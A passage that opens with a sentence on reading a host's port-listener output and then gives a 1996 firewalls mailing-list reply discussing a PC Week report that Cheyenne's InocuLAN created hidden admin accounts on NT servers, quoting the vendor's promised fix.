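On the sample this reports 838 (listening, three peers from some-pc) and the high-port listener 1234, while the outbound FTP transfer on local port 1041 is ignored; an entry like 838 still has to be tied to its owning process on the host before deciding whether it belongs there.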
From firewalls-owner Thu Feb 15 07:57:43 1996
From: Ron DuFresne
To: "Ralph C. Wolman"
Cc: firewalls@greatcircle.com
Subject: Re: article, pcweek: InocuLAN leaves NT servers open!
Date: Thu, 15 Feb 1996 08:51:35 -0600 (CST)

Ralph,

This is certainly true, I left a lot out of the article, including:

...Cheyenne officials acknowledged the problem and sent out notification to registered users...

My intent here was not to start a 'mail war' either. But twofold in other regards:

1> To point folks to some reading they may have not had time to get around to since we all can get very busy and leave these rags laying in piles for long periods of time.

2> To point out that there are some strange things happening with products for NT. Do folks here on the list often find that when they install SW on a Unix box that there are admin/root accounts created behind their backs?

Again, the points here are made not to start a war, but to let list readers know that they have to be very careful with the SW they decide to install on their boxes when playing without source....

Later,

Ron DuFresne

On Thu, 15 Feb 1996, Ralph C. Wolman wrote:

> This is *not* meant to start a mail war...
> and I'm sure starting
> a discussion about this is not appropriate for this group. However,
> since we have to put up with enough misinformation and partial
> information in the press, you should at least be fair and give the
> list *all* of the information.
>
> What you say is certainly printed in the article. However, there
> is an important additional piece of information you have left out.
>
> And I quote,
>
> "A version of InocuLAN that will prompt administrators for a
> domain password on installation will be available this week, according
> to Cheyenne officials.
>
> "Cheyenne, of Roslyn Heights, N.Y., can be reached at (800) 243